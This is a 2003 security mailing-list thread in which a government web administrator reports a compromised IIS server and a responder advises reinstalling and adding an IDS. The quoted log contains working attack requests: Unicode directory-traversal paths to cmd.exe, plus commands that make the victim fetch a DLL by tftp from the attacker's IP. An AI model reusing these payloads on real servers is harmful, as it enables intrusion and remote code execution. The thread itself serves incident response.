Re: Hacked web server

• Previous message: Nick FitzGerald: "RE: Virus? Trojan?"
• In reply to: Rogelio Vidaurri Courcelle: "Hacked web server"
• Next in thread: Michael Katz: "Re: Hacked web server"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "Tibor Biro" <tiborbiro@rogers.com>
To: "Rogelio Vidaurri Courcelle" <rvidaurri@haciendachiapas.gob.mx>, <incidents@securityfocus.com>
Date: Sun, 12 Jan 2003 18:43:08 -0500

Looks like your server was hacked by using an old exploit, check out this
link for more information.
http://www.securiteam.com/exploits/Additional_details_about_the_IIS_remote_e
xecution_vulnerability.html

This vulnerability allows the hacker to get to your server through port 80
completely bypassing your firewall. You might want to consider installing an
IDS, Snort comes to mind.

If I were you I would reinstall the entire server from scratch, your guest
might have opened some other doors.

To trace the hacker you can start by doing a reverse lookup on the address
you got in the IIS log file.

If your server is not configured to receive email then your mailroot/drop
folder should be empty. You can safely delete all files/folders from there.

Regards,
Tibor Biro

----- Original Message -----
From: "Rogelio Vidaurri Courcelle" <rvidaurri@haciendachiapas.gob.mx>
To: <incidents@securityfocus.com>
Sent: Friday, January 10, 2003 3:39 PM
Subject: Hacked web server

Hi... my web server (NT 4.0 SP6a) was hacked last friday, it has only
one NIC with a public IP
we have an OpenBSD Firewall (PF) that filters both incoming and
outcoming traffic.... this firewall has no ip addresses.....
external users have access to our web server only by port 80...
we had a popup window in our default page.... i dont know if that's why
he could hack our server.... i'm not an expert in these.. i'm a
begineer.....
(my english is not perfect sorry for the inconviniences)...
anyway.. we deleted that popup window and haven't been hacked again...
we try to patch our server but the patch "destroyed" my IIS 4.0 and we
had to reinstall everything....
in my LOGFILES i have te records of our visits.... and since 2 months
ago it's been registering this:

200.38.237.2, -, 5/01/03, 4:15:08, W3SVC, INGRESOS02, 200.38.152.221, 0,
72, 275, 403, 5, GET, /scripts/root.exe, /c+dir,
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 0,
70, 119, 404, 2, GET, /MSADC/root.exe, /c+dir,
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+dir,
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,
200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll,
200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,
200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 0,
79, 221, 500, 126, GET, /scripts/..%5c../httpodbc.dll, -,
200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
145, 261, 500, 123, GET,
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
, /c+dir,
200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
97, 261, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221,
16, 97, 275, 403, 5, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
97, 275, 403, 5, GET, /scripts/..À¯../winnt/system32/cmd.exe, /c+dir,
200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
97, 275, 403, 5, GET, /scripts/..Áœ../winnt/system32/cmd.exe, /c+dir,

i have read that it could be because of Nimda but i have scanned with
the latest pattern and it found no viruses... only a backdoor trojan
called ncx99.exe dropped in mailroot\drop\temp
by the way, can i delete files inside that folder??? there's a
rundlls32.exe... a KEY file, etcetera......

what can it be? i need help...
how could i trace the hacker??
thanks in advance.....

ISC. Rogelio Vidaurri Courcelle
Área de Sistemas y Web
Secretaría de Hacienda

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

• Next message: Michael Katz: "Re: Hacked web server"
• Previous message: Nick FitzGerald: "RE: Virus? Trojan?"
• In reply to: Rogelio Vidaurri Courcelle: "Hacked web server"
• Next in thread: Michael Katz: "Re: Hacked web server"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]